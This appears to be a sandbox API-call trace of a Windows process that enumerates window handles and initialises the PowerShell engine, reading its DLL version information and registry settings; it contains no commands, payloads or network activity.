	[0947.915] GetWindow (hWnd=0x104fa, uCmd=0x4) returned 0x0
	[0947.916] IsWindowVisible (hWnd=0x104fa) returned 0
	[0947.916] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x122c
	[0947.916] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x11c4
	[0947.916] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x11b0
	[0947.916] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1188
	[0947.916] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1148
	[0947.916] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1160
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x10fc
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe34
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xea4
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x514
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe48
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xbc8
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xdf8
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x318
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xcac
	[0947.917] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x8bc
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xf9c
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xf48
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe40
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xecc
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xeb8
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe80
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe98
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe60
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xee4
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xf00
	[0947.918] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xdf0
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe1c
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xdd0
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xd94
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xd74
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xd00
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xcd8
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc84
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xca4
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc64
	[0947.919] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc24
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xb84
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xbac
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x384
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xab8
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x33c
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa44
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa64
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x8a8
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xaf0
	[0947.920] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x88c
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xb04
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x910
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x230
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xac0
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xab4
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xaac
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x3d0
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x978
	[0947.921] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa7c
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x59c
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa88
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa6c
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa68
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x9f8
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa04
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x924
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x8dc
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x7dc
	[0947.922] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x768
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x764
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x820
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x810
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x794
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x83c
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x7ac
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xb44
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x6bc
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xb5c
	[0947.923] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x838
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x818
	[0947.924] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x5b8
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x494
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1ec
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x440
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x7e8
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x730
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2c8
	[0947.925] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x31c
	[0947.929] WerSetFlags () returned 0x0
	[0948.643] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0948.643] CoTaskMemFree (pv=0x0) 
	[0948.644] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc60 | out: pulNumLanguages=0xcdc68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc60) returned 1
	[0948.644] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc68, pwszLanguagesBuffer=0x2dff628, pcchLanguagesBuffer=0xcdc60 | out: pulNumLanguages=0xcdc68, pwszLanguagesBuffer=0x2dff628, pcchLanguagesBuffer=0xcdc60) returned 1
	[0948.650] CoTaskMemAlloc (cb=0x24) returned 0x2f5020
	[0948.650] GetUserDefaultLocaleName (in: lpLocaleName=0x2f5020, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0948.650] CoTaskMemFree (pv=0x2f5020) 
	[0948.675] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0948.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.675] CoTaskMemFree (pv=0x24c0b0) 
	[0948.678] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0948.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.678] CoTaskMemFree (pv=0x24c0b0) 
	[0948.680] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0948.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.680] CoTaskMemFree (pv=0x24c0b0) 
	[0948.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.693] SetErrorMode (uMode=0x1) returned 0x1
	[0948.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd8e0 | out: lpFileInformation=0xcd8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0948.693] SetErrorMode (uMode=0x1) returned 0x1
	[0948.693] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdb50 | out: lpdwHandle=0xcdb50) returned 0x94c
	[0948.694] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e02eb8 | out: lpData=0x2e02eb8) returned 1
	[0948.695] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdac8, puLen=0xcdac0 | out: lplpBuffer=0xcdac8*=0x2e02f54, puLen=0xcdac0) returned 1
	[0948.695] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03030, puLen=0xcda30) returned 1
	[0948.695] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0948.695] CoTaskMemAlloc (cb=0x2e) returned 0x2b0490
	[0948.695] lstrcpyW (in: lpString1=0x2b0490, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0948.695] CoTaskMemFree (pv=0x2b0490) 
	[0948.695] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03084, puLen=0xcda30) returned 1
	[0948.695] lstrlenW (lpString="System.Management.Automation") returned 28
	[0948.695] CoTaskMemAlloc (cb=0x3c) returned 0x264760
	[0948.695] lstrcpyW (in: lpString1=0x264760, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0948.695] CoTaskMemFree (pv=0x264760) 
	[0948.696] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e030e0, puLen=0xcda30) returned 1
	[0948.696] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0948.696] CoTaskMemAlloc (cb=0x20) returned 0x2f5080
	[0948.696] lstrcpyW (in: lpString1=0x2f5080, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0948.696] CoTaskMemFree (pv=0x2f5080) 
	[0948.696] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03120, puLen=0xcda30) returned 1
	[0948.696] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0948.696] CoTaskMemAlloc (cb=0x44) returned 0x264760
	[0948.696] lstrcpyW (in: lpString1=0x264760, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0948.696] CoTaskMemFree (pv=0x264760) 
	[0948.696] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03188, puLen=0xcda30) returned 1
	[0948.696] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0948.696] CoTaskMemAlloc (cb=0x76) returned 0x292fe0
	[0948.696] lstrcpyW (in: lpString1=0x292fe0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0948.696] CoTaskMemFree (pv=0x292fe0) 
	[0948.696] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03224, puLen=0xcda30) returned 1
	[0948.696] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0948.696] CoTaskMemAlloc (cb=0x44) returned 0x264760
	[0948.696] lstrcpyW (in: lpString1=0x264760, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0948.696] CoTaskMemFree (pv=0x264760) 
	[0948.696] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03288, puLen=0xcda30) returned 1
	[0948.696] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0948.696] CoTaskMemAlloc (cb=0x58) returned 0x24b550
	[0948.696] lstrcpyW (in: lpString1=0x24b550, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0948.697] CoTaskMemFree (pv=0x24b550) 
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e03304, puLen=0xcda30) returned 1
	[0948.697] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0948.697] CoTaskMemAlloc (cb=0x20) returned 0x2f5080
	[0948.697] lstrcpyW (in: lpString1=0x2f5080, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0948.697] CoTaskMemFree (pv=0x2f5080) 
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x2e02fac, puLen=0xcda30) returned 1
	[0948.697] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0948.697] CoTaskMemAlloc (cb=0x66) returned 0x2eabb0
	[0948.697] lstrcpyW (in: lpString1=0x2eabb0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0948.697] CoTaskMemFree (pv=0x2eabb0) 
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x0, puLen=0xcda30) returned 0
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x0, puLen=0xcda30) returned 0
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcda38, puLen=0xcda30 | out: lplpBuffer=0xcda38*=0x0, puLen=0xcda30) returned 0
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcda08, puLen=0xcda00 | out: lplpBuffer=0xcda08*=0x2e02f54, puLen=0xcda00) returned 1
	[0948.697] CoTaskMemAlloc (cb=0x204) returned 0x28f650
	[0948.697] VerLanguageNameW (in: wLang=0x0, szLang=0x28f650, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0948.697] CoTaskMemFree (pv=0x28f650) 
	[0948.697] VerQueryValueW (in: pBlock=0x2e02eb8, lpSubBlock="\\", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2e02ee0, puLen=0xcda50) returned 1
	[0948.705] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0948.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.705] CoTaskMemFree (pv=0x24c0b0) 
	[0948.707] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0948.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.707] CoTaskMemFree (pv=0x24c0b0) 
	[0948.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd928 | out: phkResult=0xcd928*=0x2f0) returned 0x0
	[0948.712] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd918 | out: phkResult=0xcd918*=0x2f4) returned 0x0
	[0948.712] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9a8 | out: phkResult=0xcd9a8*=0x2f8) returned 0x0
	[0948.715] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd8ec, lpData=0x0, lpcbData=0xcd8e8*=0x0 | out: lpType=0xcd8ec*=0x1, lpData=0x0, lpcbData=0xcd8e8*=0x56) returned 0x0
	[0948.716] CoTaskMemAlloc (cb=0x5a) returned 0x2eab40
	[0948.716] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd8bc, lpData=0x2eab40, lpcbData=0xcd8b8*=0x56 | out: lpType=0xcd8bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd8b8*=0x56) returned 0x0
	[0948.716] CoTaskMemFree (pv=0x2eab40) 
	[0948.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0948.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.117] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0951.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.117] CoTaskMemFree (pv=0x24c0b0) 
